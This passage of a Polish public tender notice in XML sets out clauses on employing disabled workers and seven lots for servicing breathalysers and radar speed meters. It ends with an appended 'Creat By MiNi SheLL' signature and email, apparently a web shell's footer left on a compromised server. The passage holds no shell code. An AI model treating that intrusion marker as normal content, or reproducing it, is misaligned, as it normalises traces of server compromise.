1. Wykonawca przy realizacji przedmiotowego zamówienia może zatrudnić osoby niepełnosprawne (definicja - osoby niepełnosprawne - oznacza osoby spełniające przesłanki statusu niepełnosprawności określone ustawą z dnia 27 sierpnia 1997r. o rehabilitacji zawodowej i społecznej oraz zatrudnieniu osób niepełnosprawnych (Dz. U. z 2008 r. Nr 14 poz. 92 j.t. ze zm.) Status niepełnosprawnego, określony jest posiadanym orzeczeniem o niepełnosprawności orzeczonym przez zespół do spraw orzekania o niepełnosprawności, lub orzeczeniem o całkowitej lub częściowej niezdolności  do pracy przez lekarza Zakładu Ubezpieczeń Społecznych pracownika niepełnosprawnego - zagraniczne uwarunkowania prawne, co oznacza osoby w rozumieniu Rozporządzenia Komisji (WE) Nr 800/2008 z dnia 6 sierpnia 2008 r. uznające niektóre rodzaje pomocy za zgodne ze wspólnym rynkiem w zastosowaniu art. 87 i 88 Traktatu ( ogóle rozporządzenie w sprawie wyłączeń blokowych), Dz. U. U. E. L 214 s. 3 z 9 sierpnia 2008 r.)
2. Wymagania w zakresie zatrudnienia, nie dotyczą faktu zatrudniania określonych grup pracowników w ogóle, ale zatrudnienia ich do realizacji zamówienia. Nie może stanowić spełnienia warunku określonego w pkt. 1 samo tylko zatrudnienie osób niepełnosprawnych, którzy następnie nie będą uczestniczyli w wykonywaniu zamówienia.
3. Wykonawca obowiązany jest udokumentować zatrudnianie osób, o których mowa 
w pkt. 1. W związku z tym wykonawca obowiązany jest ewidencjonować czas pracy niepełnosprawnych ze wskazaniem tożsamości danej osoby oraz czynności, które były wykonywane przez te osoby w ramach realizacji przedmiotowego zamówienia.
4. Wykonawca, w terminie 30 dni przed upływem terminu realizacji umowy 
o świadczenie usług będących przedmiotem niniejszego postępowania, przedłoży Zamawiającemu dowody zatrudnienia osób niepełnosprawnych wraz z dokumentami, z których wynika potwierdzenie orzeczenia o niepełnosprawności.
5. W sytuacji, gdy niepełnosprawny w okresie realizacji zamówienia rozwiąże umowę lub gdy uczyni to Wykonawca, zobowiązany jest on do zatrudnienia w miejsce tej osoby, inną osobę niepełnosprawną.
6. Z tytułu niespełnienia wymagań w zakresie zatrudnienia osób niepełnosprawnych, w związku z realizacją zamówienia wykonawca zapłaci karę umowną w wysokości 20% wartości zamówienia brutto.</IV_6_6><IV_6_5 /><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie>T</czy_uniewaznienie><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci>1</nr_czesci><nazwa>Zadanie nr 1:  Serwis techniczny i adiustacja oraz wzorcowanie alkomatów Alco-Sensor IV – 180 szt. </nazwa><opis>Przedmiotem zamówienia jest Serwis techniczny i adiustacja oraz wzorcowanie alkomatów Alco-Sensor IV – 180 szt. 
</opis><informacje_dodatkowe>Wykonawca może zatrudnić osoby niepełnosprawne przy realizacji przedmiotowego zamówienia.Szczegółowa informacja w p. IV.6.6)</informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>50410000-2</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>30/06/2017</data_kon><kryt_cena></kryt_cena><kryt_1>K1 - cena</kryt_1><kryt_1p>85</kryt_1p></cz_0><cz_1><nr_czesci>2</nr_czesci><nazwa>Zadanie nr 2:  Serwis techniczny i adiustacja oraz wzorcowanie alkomatów Alco-Quant 6020 Plus – 30 szt. </nazwa><opis>Przedmiotem zamówienia jest Serwis techniczny i adiustacja oraz wzorcowanie alkomatów Alco-Quant 6020 Plus – 30 szt. 
</opis><informacje_dodatkowe>Wykonawca może zatrudnić osoby niepełnosprawne przy realizacji przedmiotowego zamówienia.Szczegółowa informacja w p. IV.6.6)</informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>50410000-2</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>30/11/2017</data_kon><kryt_cena></kryt_cena><kryt_1>K1 - cena</kryt_1><kryt_1p>85</kryt_1p></cz_1><cz_2><nr_czesci>3</nr_czesci><nazwa>Zadanie nr 3:  Serwis techniczny i adiustacja oraz wzorcowanie alkomatów SENTECH ALP-1 – 6 szt. </nazwa><opis>Przedmiotem zamówienia jest Serwis techniczny i adiustacja oraz wzorcowanie alkomatów SENTECH ALP-1 – 6 szt. 
</opis><informacje_dodatkowe>Wykonawca może zatrudnić osoby niepełnosprawne przy realizacji przedmiotowego zamówienia.Szczegółowa informacja w p. IV.6.6)</informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>50410000-2</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>30/11/2017</data_kon><kryt_cena></kryt_cena><kryt_1>K - cena</kryt_1><kryt_1p>85</kryt_1p></cz_2><cz_3><nr_czesci>4</nr_czesci><nazwa>Zadanie nr 4:  Serwis techniczny i legalizacja radarowych mierników prędkości Rapid – 142 szt. oraz Iskra – 2 szt.</nazwa><opis>Przedmiotem zamówienia jest Serwis techniczny i legalizacja radarowych mierników prędkości Rapid – 142 szt. oraz Iskra – 2 szt.
</opis><informacje_dodatkowe>Wykonawca może zatrudnić osoby niepełnosprawne przy realizacji przedmiotowego zamówienia.Szczegółowa informacja w p. IV.6.6)</informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>50410000-2</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>30/11/2017</data_kon><kryt_cena></kryt_cena><kryt_1>K1 - cena</kryt_1><kryt_1p>85</kryt_1p></cz_3><cz_4><nr_czesci>5</nr_czesci><nazwa>Zadanie nr 5:  Serwis techniczny i adiustacja testerów trzeźwości - Drager 6510 – 62 szt.</nazwa><opis>Przedmiotem zamówienia jest Serwis techniczny i adiustacja testerów trzeźwości - Drager 6510 – 62 szt.
</opis><informacje_dodatkowe>Wykonawca może zatrudnić osoby niepełnosprawne przy realizacji przedmiotowego zamówienia.Szczegółowa informacja w p. IV.6.6)</informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>50410000-2</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>30/11/2017</data_kon><kryt_cena></kryt_cena><kryt_1>K1-cena</kryt_1><kryt_1p>85</kryt_1p></cz_4><cz_5><nr_czesci>6</nr_czesci><nazwa>Zadanie nr 6:  Serwis techniczny i adiustacja testerów trzeźwości - AlcoBlow – 76 szt.</nazwa><opis>Przedmiotem zamówienia jest Serwis techniczny i adiustacja testerów trzeźwości - AlcoBlow – 76 szt.
</opis><informacje_dodatkowe>Wykonawca może zatrudnić osoby niepełnosprawne przy realizacji przedmiotowego zamówienia.Szczegółowa informacja w p. IV.6.6)</informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>50410000-2</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>30/11/2017</data_kon><kryt_cena></kryt_cena><kryt_1>K1 - cena</kryt_1><kryt_1p>85</kryt_1p></cz_5><cz_6><nr_czesci>7</nr_czesci><nazwa>Zadanie nr 7:  Serwis techniczny i adiustacja testerów trzeźwości SENTECH AL 1100 F – 80 szt.</nazwa><opis>Przedmiotem zamówienia jest Serwis techniczny i adiustacja testerów trzeźwości SENTECH AL 1100 F – 80 szt.
</opis><informacje_dodatkowe>Wykonawca może zatrudnić osoby niepełnosprawne przy realizacji przedmiotowego zamówienia.Szczegółowa informacja w p. IV.6.6)</informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>50410000-2</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>30/11/2017</data_kon><kryt_cena></kryt_cena><kryt_1>K1- cena</kryt_1><kryt_1p>85</kryt_1p></cz_6></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com